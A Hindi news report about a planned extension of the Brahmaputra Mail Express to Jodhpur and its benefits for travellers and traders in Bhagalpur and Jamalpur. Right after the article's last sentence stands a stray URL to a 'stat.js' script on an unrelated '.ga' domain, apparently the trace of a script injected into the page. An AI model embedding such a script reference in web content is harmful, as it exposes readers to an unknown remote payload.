भागलपुर,( कुलसूम फात्मा ) ब्रह्मापुत्र मेल एक्सप्रेस को जोधपुर तक चलाने का विचार विमर्श किया जा रहा है जिससे जमालपुर, भागलपुर तथा किऊल के यात्री ब्रह्मपुत्र मेल एक्सप्रेस से जोधपुर तक के सफर कर सकें इस संचालन से जमालपुर तथा भागलपुर को जोधपुर जाने तथा आने में काफी सहायता प्राप्त होगी।

 

 

आपको बता दें की जोधपुर जाने के लिए भागलपुर रेल खंड से एक भी ट्रेन उपलब्ध नहीं थी यात्रियों को ट्रेन की सहूलियत प्राप्त नहीं होती है जिसकी वजह से नई ट्रेन की मांग की गई है और पिछले साल से इसके सम्बन्ध में बातचीत भी चल रही है। कोरोना महामारी के वजह से ट्रेनों की संख्या में कमी भी हो गई है। इसलिए वर्तमान समय में चलाई जा रही स्पेशल ट्रेनों के मार्ग को विस्तारित करने की मांग की गई है। अब रेलवे बोर्ड नई दिल्ली ने सकारात्मक इशारा दिया है और आने वाले माह में बहुत जल्दी ट्रेन का संचालन जोधपुर तक के कर दिया जाएगा।

 

 

यदि हम विस्तार से बात करें तो रेलवे बोर्ड नई दिल्ली ने यात्रियों द्वारा मांग को पूरा करने का निर्णय लिया है। ब्रह्मपुत्र मेल एक्सप्रेस को जोधपुर तक के चलाने की बातचीत चल रही है। इसके लिए बोर्ड खास विचार-विमर्श भी कर रहा है।  पूर्व रेलवे मालदा मंडल के एक वरीय अधिकारी से जब बातचीत की तो उन्होंने बताया की मालदा मंडल की महत्वपूर्ण ट्रेनों में एक डिब्रूगढ़ दिल्ली मेल एक्सप्रेस है। इस ट्रेन को डिब्रूगढ़ की जगह कामाख्या से दिल्ली तक के संचालित किया जा रहा है। आने वाले 2 माह के अंतर्गत इसका परिचालन एक बार फिर डिब्रूगढ़ से किया जाएगा।

 

 

और आने वाले मार्च माह में पहले डिब्रूगढ़ से जोधपुर के लिए परिचालन प्रारंभ होगा। इससे जमालपुर तथा भागलपुर को जोधपुर जाने तथा आने में काफी सहायता प्राप्त होगी।  इसके साथ ही सिल्क सिटी – लोहा नगरी से सीधे जुड़ जाएंगे। जोधपुर ब्रह्मपुत्र मेल एक्सप्रेस मार्ग जोधपुर होने से सिल्क सिटी भागलपुर तथा लोहा नगरी जमालपुर भी सीधा जुड़ जाएंगे। इससे दोनों सिटी में व्यापार भी बढ़ने का अंदेशा है। इधर व्यवसाई चंदन कुमार प्रवीण विकी कुमार से जब बातचीत की तो उन्होंने बताया की जोधपुर में आवश्यकता के सामानों का बड़ा व्यापार होता है और यदि ट्रेन की सहायता मिल जाएगी तो हजारों का सामान, जमालपुर, मुंगेर तथा भागलपुर में देखने को मिलेगा।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.